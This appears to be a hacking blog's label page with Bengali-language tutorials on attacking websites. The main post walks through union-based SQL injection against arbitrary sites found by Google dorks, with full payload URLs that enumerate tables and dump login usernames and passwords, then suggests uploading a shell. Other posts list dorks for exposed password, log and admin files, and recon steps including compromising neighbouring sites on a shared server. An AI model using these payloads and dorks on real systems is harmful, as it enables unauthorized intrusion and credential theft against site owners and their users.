Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, February 14, 2016

Hack WiFi Network and Crack WiFi Password from Android Mobile in Just Two Minutes

Like we always Android is not just a phone. It’s much more than an average phone. Now here we with another trick, that you were going to do with your android phone. Nowadays I receive 10-20 messages on email, Dude how  I hack wi-fi password from android mobile. It is possible or not.
·   0

Monday, January 12, 2015

Web Site Hacking : Sql Injection (Union Based)

SQL INJECTION (Union Based SQLi)

সবাই আশা করি ভালো আছেন।
(এই টিউটোরিয়ালটি শুধুমাত্র শিক্ষনীয় উদ্দ্যেশ্যে লেখা হয়েছে)
এখন থেকে আমি SQL INJECTION নিয়ে নিয়মিত ব্লগ লেখার চেষ্টা করবো।
আজকে আমি আপনাদের সাথে বেসিক ইউনিয়ন বেজড SQL INJECTION
কিভাবে করা হয় সেটা দেখাবো।
এবং বিস্তারিত আলোচনা করার চেষ্টা করবো আশা করি ধৈর্য সহকারে পড়বেন।
  • SQL INJECTION কি?
SQL INJECTION  হচ্ছে বর্তমান সময়ের ওয়েবসাইট হ্যাকিং সবচেয়ে জনপ্রিয় এবং
কমন মেথড/পদ্ধতি।
আসলে SQL INJECTION হচ্ছে তেমন কঠিন জিনিস না তবে
এটা ভালোভাবে শিখতে হলে,
এটার পিছনে আপনার অনেক সময় দেওয়া লাগবে।
কিন্তু হ্যাকিং এ নতুন এমন  অনেক Newbiee হ্যাকার মনে করে যে SQL INJECTION কোনো বড ব্যাপার নাহ
কারণ তারা খুব সহজেই বিভিন্ন টুলস(Havij,Sqlmap,Sqlninja) ইত্যাদি ব্যাবহার করে SQL INJECTION  করতে পারে।
কিন্তু SQL INJECTION  এমন একটা জিনিস যেটা সম্পর্কে আপনার সম্পূর্ণ শিখতে হলে অনেক বই শেষ করা লাগবে :)
এর মানে বোঝা গেলো যে শুধুমাত্র টুলস ব্যাবহার করে আপনি অনেক সাইট কিন্তু SQL INJECTION করতে পারবেন।
কিন্তু তার দ্বারা আসলেই কোনো লাভ হবে না।
কারণ আপনি কিছুই শিখতে পারবেন না।
এবং অনেক সময় টুলস দিয়েও SQL INJECTION এর জন্যে দুর্বল/ভুলনারেবল সাইট হ্যাক করতে পারবেন না।
যায় হোক।
  • SQL INJECTION দ্বারা কি কি করতে পারবেন আপনি?
  1. আপনি ডাটাবেসে তথ্য তে এক্সেস নিতে পারবেন।
  2. আপনি ডাটাবেসের তথ্য মোডিফাই করতে পারবেন।
  3. আপনি সাইটের লগইন এরিয়া বাইপাস করতে পারবেন।
  4. আপনি SQL Server হ্যাক করতে পারবেন।
তাহলে শুরু করা যাক।
প্রথমত আমাদের SQL INJECTION এর জন্যে ভুলনারবল সাইট বের করতে হবে।
যদি আপনি হ্যাকার হন,তাহলে আপনি ভালো করেই জানবেন যে সার্চ ইঞ্জিন হলো হ্যাকারদের
সবচেয়ে বেস্ট ফ্রেন্ড।আমরা SQL INJECTION ভুলনারবল সাইট GOOGLE Dork
ব্যাবহার করে বের করতে পারবো।
নিচে আমি কিছু কমন SQL INJECTION Dork দিচ্ছিঃ
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
Dork আরো অনেক বড বিশাল লিস্ট আছে। পরে কোনো এক সময় শেয়ার করবো।
অথবা আপনি গুগল থেকে সার্চ করে বের করে নিতে পারেন।
এখন আপনি এখান থেকে যেকোনো একটি Dork নিয়ে গুগলে সার্চ দিলে
রেসাল্টে অনেক সাইট দেখতে পাবেন।
সেখান থেকে যেকোনো একটি সাইটে প্রবেশ করুন।
মনে করুন এরকম একটি সাইট পেলেন আপনি (উদাহারণ)
website.com/index.php?id=1
এই ইউআরএল টি অনেক রকমের হতে পারে। তবে আমি উদাহারণের জন্যে এটি দেখালাম।
এখন আমরা টেস্ট করবো সাইটটি SQL INJECTION ভুলনরাবল কিনা।
তার জন্যে আমি সাইটের শেষে এই (') চিহ্নটি দিবো (ব্রাকেটের মাঝখানের চিহ্নটি)
উদাহারণঃ
website.com/index.php?id=1'
এখন যদি সাইটি SQL INJECTION এর জন্যে ভুলনারবল হয় তাহলে
আপনি এরকম কিছু এরর দেখতে পাবেন।
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
অথবা,
Warning: mysql_fetch_array()
অথবা আপনি যদি কোনো রকমের mysql এরর দেখতে পান।
অথবা যদি সেই ওয়েব পেইজ থেকে কোনো ডাটা মিস করে তাহলে বুঝতে হবে
সাইটটি SQL INJECTION ভুলনরাবল।
যদি এসবের কিছু না হয় তাহলে সাইটটি ভুলনারবল নাহ!
অন্য আরেকটি সাইট খুজুন।
এরর পাওয়ার পরে এখন আমাদের কাজ হবে সাইটটি কি এক্সপ্লইটিং করার ।
মানে SQL INJECTION করতে হবে।
আমরা এতক্ষন ভুলনারবল সাইট বের করলাম,এখন আমাদের কাজ হবে সাইটটি থেকে ডাটা
ডাম্প করা বা হ্যাক করা।
এখন আমাদের পরবর্তী পদক্ষেপ হবে এই ডাটাবেসের টেবিলে কলামের সংখ্যা কতো সেটা বের করা।
সেজন্যে আমরা ' চিহ্ন টি order by statement এ পরিবর্তন করবো।
উদাহারণঃ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
আমাদের order by এর নাম্বার টি বাডিয়ে যেতে হবে যতক্ষন না আমরা
সাইটটি তে কোনো এরর দেখতে না পায়।
এরর অনেকটা এরকম হতে পারে,
unknown column numbers
অথবা
সাইটের কিছু ডাটা মিস হতে পারে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR সাইটের কনটেন্ট মিস হচ্ছে।
এখন আমারা order by 21 পর্যন্ত আসার পর error দেখতে পেলাম।
কিন্তু order by 20 দিলে কোনো এরর নেই।
তার মানে ডাটাবেসে ২০ টি কলাম আছে।
অনেক সময় order by 1000 দিলেও এরর আসে নাহ।
সে ক্ষেত্রে id / parameter এর শেষে ' চিহ্ন টি দিতে হয়
এবং শেষে একটি + যোগ করতে হয়।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
এখন আমাদের জানা আছে যে এই ডাটাবেসে ২০টি কলাম আছে।
এখন আমাদের কাজ হবে সব কলাম সিলেক্ট করা union select statement ব্যাবহার করে।
select statement টি Data দেখার জন্যে ব্যাবহার করা হয়।
যায় হোক এর পর্যায়ে আমরা এই কোডটি ব্যাবহার করবো।
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
এখন আমরা ওয়েব পেইজে কিছু নাম্বার দেখতে পাবো।
নম্বর গুলো ১-২০ এর মধ্যে হবে কারণ আমরা জানি এই সাইটের কলাম ২০ টি।
আর আমরা যে কমান্ডটি ব্যাবহার করেছি সেটা দিয়ে ২০টি কলামের মধ্যে কোনটি
String কলাম সেটা বের করার জন্যে এই কমান্ড টি ব্যাবহার করেছি।
যদি আপনি কোনো নাম্বার দেখতে না পান তাহলে
parameter value এর আগে একটি - চিহ্ন দেন।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
আপনি ওয়েবপেইজে কিছু নাম্বার দেখতে পাবেন।
আমি ৩,৪ দেখতে পেলাম।
এই দুইটা হলো String Column আমরা ডাটাবেস থেকে তথ্য হ্যাক করতে পারবো
এই দুইটি কলাম ব্যাবহার করে।
অনেক সময় উপরে যে কমান্ডটি নিয়ে লেখেছি সেটা কাজ করে নাহ :(
সে ক্ষেত্রে আমরা এরর দেখতে পাবো।
এই ক্ষেত্রে waf bypass করতে হবে।
সেটা সম্পর্কে সামনের টিউটোরিয়াল গুলোতে আলোচনা করবো।
এখন আমাদের কাজ ডাটাবেস থেকে ডাটা হ্যাক করা।
আমরা এখন ডাটাবেসের সংরক্ষিত গোপন ডাটা গুলো হ্যাক করতে পারবো।
এছাডাও আমরা ডাটাবেসের নাম database() এই কমান্ড টি ব্যাবহার করে,
ডাটাবেস ভার্সন জানতে  version() এই কমান্ডটি ব্যাবহার করে বের করতে পারবো।
এছাডাও আমরা SQL INJECTION এর মাধ্যমে লোড ফাইল মেথড ব্যাবহার করে
ভুলনরাবল সাইটে শেল আপলোড দিতে পারবো (এই বিষয়ে পরে টিউটোরিয়াল লেখা হবে)
এই টিউটোরিয়াল টি তে আমরা ডাটাবেস ইউজার নেম এবং ডাটাবেস ভার্সন বের করবো,
৩ এবং ৪ নম্বর String কলাম ব্যাবহার করে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
আমি এখানে 0x3a ব্যাবহার করেছি এটা হলো সেমিকোলন (;) এর হেক্স ভ্যালু
এটা দুইটা ডিফারেন্ট ভ্যালু কে ডিফারেন্ট প্যারামিটার এ সেপারেট করে দেখাবে।
এখন দেখা যাবে যে ৩ এর ৪ নম্বর ভুলনারবল সাইটের জায়গায় ডাটাবেস ভার্সন এবং
ডাটাবেসের ইউজারের নাম দেখাবে।
এখন আমরা ভুলনারবল সাইটের যে যে ডাটাবেস সেটা বের করবো।
তার জন্যে আমাদের কলাম নেমের জায়গায় SQL QUERY দিয়ে রিপ্লেস করতে হবে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--
এখন আমরা দুইটা ডাটাবেস দেখতে পাবো
একটি information_schema আরেকটি site_database এটা সাইট এডমিন যে নামে দিয়েছে সে নামে হবে
এখন information_schema নিয়ে আমাদের কোনো কাজ নেই কারণ
কারণ information_schema তে সিস্টেম টেবিল থাকে যা ডাটাবেস কে ডিফাইন করে।
আমরা এই টেবিল গুলো ব্যাবহার করে ডাটাবেসের লে-আউট স্টাইল চেক করতে পারবো।
যায় হোক এইগুলা অনেক এডভান্স লেভেলের কথা বার্তা লোল :p
যা এখন আপনারা বুঝতে পারবেন না।
এখন আমাদের কাছে ডাটাবেস আছে (আসলে আমাদের ডাটাবেসের নাম চেক করার দরকার ছিলো না
আমি শুধু শেখার উদ্দেশ্যে সেই বিষয়ে বললাম।আমরা যদি সাইটের ডাটাবেস থেকে ডাটা হ্যাক করতে চায়
তাহলে আমরা ডাটাবেস ফাংশন ব্যাবহার করেই ডাটা ডাম্প করতে পারি।
সে ক্ষেত্রে site_database এর নাম জানার আর দরকার হবে না।
আমরা এই টিউটোরিয়ালে database() এই ফাংশন টি ব্যাবহার করে ডাটা হ্যাক করবো।)
এখন আমরা ডাটাবেস থেকে টেবিলস বের করবো।
এখন আমরা where কন্ডিশন টি ব্যাবহার করবো এই query তে।
আমরা টেবিলস নেম বের করবো select statement ব্যাবহার করে
এবং where কন্ডিশনটি ব্যাবহার করবো এটা দেখানোর জন্যে কোন ডাটাবেস থেকে আমরা টেবিলস
বের করতে চাচ্ছি।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
এখন আপনি টেবিলস দেখতে পাবেন।
মনে করেন এই টেবিলস গুলা আমরা পেলাম।
  • archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
এখন আমাদের দেখতে হবে এই গুলোর মধ্যে সেনসেটিভ টেবিল কোনটা যেখানে গুরুত্বপূর্ণ ডাটা থাকবে ?
সেটা হচ্ছে login টেবিল।
এক এক ক্ষেত্রে এক এক রকম হতে পারে টেবিল নেম। নিজের বুদ্ধি খাটান!
আমরা এখন login টেবিল থেকে ডাটা হ্যাক করবো ।
এখন আমরা group_concat(table_name) কে group_concat(column_name) এবং information_schema.tables কে information_schema.columns
দিয়ে রিপ্লেস করবো এবং table_schema এর জায়গায় table_name ব্যাবহার করবো।
এখন আমারা table_name কে একটি প্যারামিটার দিবো টেবল নেম টি quote এ নিয়ে আসবো
table_name='login'
আমরা qoute কেনো ব্যাবহার করলাম??
কারণ এটার ডাটা টাইপ varchar...
অনেক সময় এই পদ্ধতি টি কাজ করে নাহ...
সে ক্ষেত্রে টেবিল নাম কে char এ রুপান্তর করতে হয়।
এটা করার জন্যে মোজিলা ফায়ার ফক্সে হ্যাকবার নামে একটি এডঅন আছে ওটা এড করে নিন।
সহজের char এ রুপান্তর করতে পারবেন।
আমি login table টাকে char এ রুপান্তর করার পর সেটা হলো
CHAR(108, 111, 103, 105, 110)
এখন আমরা কমান্ডটি ব্যাবহার কিভাবে করে সেটা দেখবো।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
এখন আমরা login টেবিলের কলাম গুলো দেখতে পাবে
আমি যা যা পেলাম।
id,username,password,email,date_added,lastlogin,sessionid,type,status
এখন আসল কাজ শুরু ।
এখন আমরা কলাম থেকে id এবং password হ্যাক করবো ।
এখন আমরা (username,0x3a,password) এই কমান্ডটি ব্যাবহার করবো
এবং login টেবিল থেকে এই দুইটি কলামের ডাটা বের করবো ।
যার জন্যে কমান্ড হবে।
উদাহারণঃ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
এখন আপনি username এবং password দেখতে পাবেন।
এখন আপনার কাজ হবে এডমিন প্যানেল বের করে সাইটটা তে শেল আপলোড করে হ্যাক করে ফেলা :D 

ভাল লাগলে আশা করি একটা ধন্যবাদ দিয়ে কমেন্ট করবেন।

·   0

Website hacking: information gathering tutorial part-2 :information gathering using google (bangla)

সবাইকে স্বাগতম ইনফরমেশন গ্যাদারিং নিয়ে লেখা আমার ২য় টিউটোরিয়ালে। আমার আগের টিউটোরিয়াল গুলো যদি না পড়ে থাকেন তাহলে পড়ে নিতে পারেন কাজে দিবে আশা করি।
আজকের টিউটোরিয়ালে আমরা শিখবো কিভাবে আমরা গুগল ব্যাবহার করার মাধ্যমে একটি সাইটের গুরুত্বপূর্ণ ইনফরমেশন বের করতে পারি সেটা।
যা আমাদের সাহায্য করবে সাইটটি হ্যাক করতে বা সাইটের দুর্বলতা বের করতে।
এই জিনিসটিকে গুগল ডরক ও বলা হয়।
প্রথমে আমি দেখাবো এইগুলোর কাজ কি সেটা এবং তারপর দেখাবো কিভাবে ব্যাবহার করতে হয় সেটা।
inurl:- এটা ব্যাবহার করা হয় কোনো নির্দিষ্ট লিঙ্ক খোজার জন্যে, যেমন আপনি যদি গুগলে এটা লেখে সার্চ দেনঃinurl:index.php?id= তাহলে গুগল আপনাকে দেখাবে
গুগলে ইনডেক্সে যত ইউআরএল আছে  "index.php?id=" এই ধরনের সেগুলো। হ্যাকার রা এই ডরক টি ব্যাবহার করে ভুলনরাবল স্ক্রিপ্ট ,প্লাগিন, অথবা গুরুত্বপূর্ণ ওয়েবসাইটের তথ্য বের করতে।
intext:- এই ডরক টি ব্যাবহার করা হয় একটি ওয়েবসাইটের বডি অথবা সোর্স কোড থেকে কোনো ওয়ার্ড সার্চ করার জন্যে।
এটা বেশীর ভাগ সময় ব্যাবহার করা হয় কোনো  ওয়েব এপ্ল্যিকেশনের নির্দিষ্ট ভার্সনের সাইট বের করার জন্যে যেটা হ্যাক করা যাবে।
filetype -
এটা ব্যাবহার করা হয় টার্গেট ওয়েবসাইট থেকে কাঙ্খিত ফরম্যাটের ফাইল বের করার জন্যে। এই ডরক টি ব্যাবহার করে আপনি যেকোনো টাইপের ফাইলের জন্যে সার্চ করতে পারেন।
এটা ব্যাবহার করে টার্গেট সাইট থেকে সেনসেটিভ ইনফরমেশন বের করে সেটা ওয়েবসাইটটি এক্সপ্লইট করতে কাজে লাগায়।
intitle:- এটা ব্যাবহার করা হয় কোনো টাইটেল সার্চ করার জন্যে ওয়েব পেইজের, এই ডরক টি ব্যাবহার করে মুলত ভুলনরাবল পেইজ বা ওয়েবসাইটের ইনডেক্স বের করা হয়।
site -
এটা ব্যাবহার করে কোনো একটি নির্দিষ্ট ওয়েবসাইটের জন্যে ডরক ব্যাবহার করা হয়। এটা দ্বারাও আপনি গুরুত্বপূর্ণ ইনফরমেশন বের করতে পারবেন।
এটার ব্যাপারে আরো বিস্তারিত জানবেন শেষের দিকে যখন এটার ব্যাবহার কিভাবে করা হয় সেটা জানাবো ।
link :-এটা দিয়ে দেখা হয় যে টার্গেট ওয়েবসাইটটির তথ্য আর কোনো ওয়েবসাইটে আছে নাকি। এটা দিয়েও টার্গেট ওয়েবসাইট সম্পর্কিত বিভিন্ন তথ্য পাওয়া যায় । যেটা এক্সপ্লইট করতে কাজে লাগতে পারে সেই
টার্গেটটিকে।
subtract:-  গুগল অনেক সময় অনেক অপ্রজোনীয় রেসাল্ট দেখায় যেটার কোনো দরকার নেই। আপনি যেটা চাচ্ছেন শুধুমাত্র সেটাই দেখার জন্যে এই ডরক টা ব্যাবহার করতে পারেন।
এখন আমি আপনাদের উদাহারণ দেওয়ার চেষ্টা করবো কিভাবে ডরক ব্যাবহার করে আপনি একটি সাইটের সম্পর্কে তথ্য বের করতে পারেন যা আপনাকে সাহায্য করবে সাইটটি হ্যাক করতে।
যদি কোনো সাইটের সাব-ডোমেইন বের করতে চান তাহলে সেটার জন্যে গুগলে সার্চ করুন এভাবেঃ
site:yoursite.com -site:www.yoursite.com
-
যদি টার্গেট সাইটের কোনো ওপেন ইনডেক্স বা insecure directory খুজে বের করতে চান তাহলে এই ডরক টি ব্যাবহার করুন (ভালোভাবে বোঝার জন্যে সার্চ করে দেখুন গুগলে yoursite.com
এর জায়গায় আপনার টার্গেট সাইটের নাম দিবেন)
intitle:"index of /" Parent Directory site:yoursitehere.com
-
এডমিন ডাইরেক্টরি বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /admin" site:yoursitehere.com
-
পাসওয়ার্ড ডাইরেক্টরির জন্যে এই ডরকটিঃ
intitle:"Index of /password" site:yoursitehere.com
-
ই-মেইল ডাইরেক্টরির জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /mail" site:yoursitehere.com
-
যদি আপনি পাসওয়ার্ড ফাইলের জন্যে সার্চ করতে চান তাইলে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /" passwd site:yoursitehere.com
-
passoword.txt এই ধরনের ফাইল খোজার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
intitle:"Index of /" password.txt site:yoursitehere.com
-
htaccess ফাইল বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেন।
intitle:"Index of /" .htaccess site:yoursitehere.com
-
বিভিন্ন ধরনের এক্সটেনশনের জন্যে সার্চ করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ আমজ .mdb extension এর ফাইল বের করার জন্যে এই ডরক টি ব্যাবহার করলাম:
 intitle:"index of ftp" .mdb site:yoursitehere.com
-
এডমিন পেইজ বা লগিন করার জন্যে কোনো পেইজ বের করতে এই ডরক টি ব্যাবহার করতে পারেনঃ
Intitle: "login" "admin" site:yoursitehere.com
-
InURL  ব্যাবহার করে আমরা একটি ওয়েবসাইট সম্পর্কে বিভিন্ন তথ্য বের করতে পারি গুগল ব্যাবহার করে আর এই ডরক টিই সবচেয়ে বেশী ব্যাবহারিত হয়,
যদি আপনার এই ডরক টা ব্যাবহার করে এডমিন পেইজ বের করতে চান তাহলে সে ক্ষেত্রে ডরক টি হবেঃ
inurl:admin site:yoursitehere.com
-
লগিন পেইজ বের করার জন্যে এই ডরক টি ব্যাবহার করতে পারেনঃ
inurl:login site:yoursitehere.com
-
FileType ব্যাবহার করে আমরা আমাদের টার্গেট ওয়েবসাইটের বিভিন্ন গুরুত্বপূর্ণ ফাইল বের করতে পারি
যদি কোনো টেক্সট ফাইল খুজতে চান যেখানে পাসওয়ার্ড আছে বা এই নামের কোনো ফাইল টেক্সট ফরম্যাটে আছে সাইটটাতে তাইলে ডরক হবেঃ
inurl:passwd filetype:txt site:yoursitehere.com
-
এই ডরক টি ব্যাবহার করে আপনি ডাটাবেইস ফাইল এর জন্যে সার্চ করতে পারবেন যেটার লিঙ্ক হচ্ছে এডমিন পেইজের সাথে সম্পরকিতঃ
inurl:admin filetype:db site:yoursitehere.com
-
সাইটের লগ বের করার জন্যেঃ
filetype:log site:yoursitehere.com
এই লগ ফাইলে অনেক সময় গুরুত্বপূর্ণ তথ্য পাওয়া যেতে পারে।
-
Excel এবং csv ফরম্যাটের ফাইল বের করার জন্যে এই ডরকটি ব্যাবহার করতে পারেনঃ
filetype:xls csv site:yoursitehere.com
-
অন্য যেকোনো ওয়েবসাইটে যেখানে আপনার টার্গেট ওয়েবসাইটের লিঙ্ক ব্যাবহার করা হয়েছে সেই ওয়েবসাইট গুলো বের করতে এই ডরক টি ব্যাবহার করতে পারেনঃ
link:yoursite.com -site:yoursite.com
-
আপনি গুগল ট্রান্সলেট কে প্রক্সির মত ব্যাবহার করেও একটি ওয়েবসাইটে প্রবেশ করতে পারেনঃ
http://translate.google.com/translate?hl=en&sl=ar&tl=en&u=http://www.yoursitehere.com/urlhere
-
আপনি এই ওয়েবসাইটি ব্যাবহার করেঃ shodanhq.comটার্গেট সম্পর্কে বিভিন্ন তথ্য বের করতে পারেন ।
ওয়েবসাইটটির সার্চ বক্সে গিয়ে এইভাবে আপনার ডরক টি ব্যাবহার করুনঃ
hostname:yoursitehere.com dork
Dork লেখা জায়গায় আপনার যে Dork টি ইচ্ছে সেটা দিবেন।
আসলে গুগল হচ্ছে হ্যাকারের সবচেয়ে বড় বন্ধু ।
গুগল ডরক যে শুধুমাত্র এইগুলা তাই কিন্তু না । আপনি যদি এই জিনিস গুলো হালকা পাতলা ভাবে বুঝতে পারেন তাহলে হয়তো আপনি নিজে থেকেও ডরক বানাতে পারবেন :)
পরের পর্ব পড়ার আমন্ত্রন জানিয়ে আজকে আমার টিউটোরিয়াল এখানেই শেষ করছি।
ধন্যবাদ সবাইকে।
বি দ্রঃ দয়া করে কেউ পোস্টটি  কোথাও কপি করে পেস্ট করবেন না। যদি শেয়ার করতে চান লিঙ্ক শেয়ার করুন। যদি কেউ শেয়ার করেন তাহলে সেটাকে চুরি ধরা হবে।
·   0

Website Hacking :information gathering using online website

সবাইকে স্বাগতম, আজকে আমি এই টিউটোরিয়ালে লেখার চেষ্টা করবো কিভাবে অনলাইন বেজড কিছু ওয়েবসাইট ব্যাবহার করে,  টার্গেট সাইট (টার্গেট সাইট বলতে,যে ওয়েবসাইট টি আপনি হ্যাক করতে চান) সেই ওয়েবসাইট সংক্রান্ত গুরুত্বপূর্ণ তথ্য গুলো কিভাবে বের করা যায় সেটা দেখাবো।
আমরা নিচের ওয়েবসাইট গুলো ব্যাবহার করবো এই টিউটোরিয়ালে আমাদের টার্গেট সম্পর্কে তথ্য বের করতে।
সবার শেষে আমরা robots.txt ফাইল টি চেক করবো ওয়েবসাইট প্যাথ বের করতে যা এডমিন বট থেকে হাইড করে রেখেছে যাতে সেটা যার ইচ্ছে সে দেখতে না পারে । robots.txt অনেক গুরুত্বপূর্ণ প্যাথ (path) এর লিঙ্ক পেতে পারেন।
যা স্ক্যানিং এ আমাদের সাহায্য করবে। আমি সাইট গুলো  সম্পর্কে বিস্তারিত দেখাচ্ছি।
1. Netcraft
এই ওয়েবসাইটের মাধ্যমে আমরা ওয়েব হোস্টিং এবং সার্ভারের  বিভিন্ন গুরুত্বপূর্ণ  তথ্য বের করতে পারবো।
এই ওয়েবসাইটের মাধ্যমে দেখা যাবে আপনার টার্গেট সিস্টেম কি ধরনের সার্ভার ব্যাবহার করছে এবং সেটার আইপি এড্রেস ও বের করতে পারবেন এই ওয়েবসাইটটি ব্যাবহার করে। এছাড়াও who is information এবং server slide technologies ইত্যাদি বের করতে পারবেন। যেসব তথ্য আপনি এই সাইট ব্যাবহার করে পাবেন সেগুলো রিপোর্ট আকারে সেইভ করে রাখতে পারেন যা আপনার কাজে লাগবে সাইটটি কে হ্যাক করতে।
2.Yougetsignal
অনেক সময় আপনি যে সাইটটি টার্গেট করবেন হ্যাক করার জন্যে ঐ সাইটটি ভুলনরাবল নাও হতে পারে। এমন অবস্থায় আপনি reverse ip dmoain lookup ব্যাবগার করে এই সার্ভারের অন্য সাইট গুলো বের করতে পারেন । এবং সে সাইট গুলোর মধ্যে যেকোনো একটি সাইট ভুলনরাবল হলে আপনি সেই সাইটটি হ্যাক করে আপনার টার্গেট সাইট যে সার্ভারে আছে সেই সার্ভারে এক্সেস নিতে পারেন যেটা আপনাকে সাহায্য করবে আপনার টার্গেট সাইট হ্যাক করার ক্ষেত্রে।
এই সাইটটি অনলাইনের অনেক ওয়েবসাইটের হিস্টোরি মেইন্টেইন করে থাকে। অনেক সময় এই ওয়েবসাইট থেকে আপনি আপনার টার্গেট করা ওয়েবসাইটের এমন সব ইনফরমেশন পেতে পারেন যা হয়তো আপনার টার্গেট ওয়েবসাটে আর দেখাচ্ছে না সিকিউরিটি ইস্যুর কারণে মানে তারা তথ্য গুলো সরিয়ে ফেলেছে যাতে তথ্য গুলো ব্যাবহার করে কেউ যেন তাদের ওয়েবসাইটের ক্ষতি না করতে পারে।
4.Robots.txt 
robotx.txt এমন একটি ফাইল যেটা ব্যাবহার করে ওয়েব এডমিন তার ওয়েবসাইটের গুরুত্বপূর্ণ পেইজ গুলো যেমন admin page
Disallow করে রাখে যাতে কোনো Crawler দিয়ে সাইটটি স্ক্যান করার সময় এইসব গুরুত্বপূর্ণ পেইজ গুলো crawler এ ধরা না পড়ে যায়। কিন্তু আসল সমস্যা হচ্ছে এই robotx.txt যে কেউ দেখতে পারে। এই পেইজ টা দেখলেই বোঝা যায় যে কোন কোন পেইজ গুলো এডমিন হাইড করে রেখেছে । এই ফাইলটির মধ্যে আপনি অনেক গুরুত্বপূর্ণ ইনফরমেশন পেতে পারেন যা আপনার টার্গেট ওয়েবসাইট কে হ্যাক করতে আপনাকে সাহায্য করবে। কারণ এই প্যাথ বা পেইজ গুলো এডমিন এই কারণেই লুকিয়ে রেখেছে কারণ এতে অনেক গুরুত্বপূর্ণ পেইজ আছে।
ধন্যবাদ টিউটোরিয়াল টি পড়ার জন্যে,ভালো লেগে থাকলে কমেন্ট করুন যদি ভালো নাও লেগে থাকে তাহলে জানান। ধন্যবাদ ।
·   0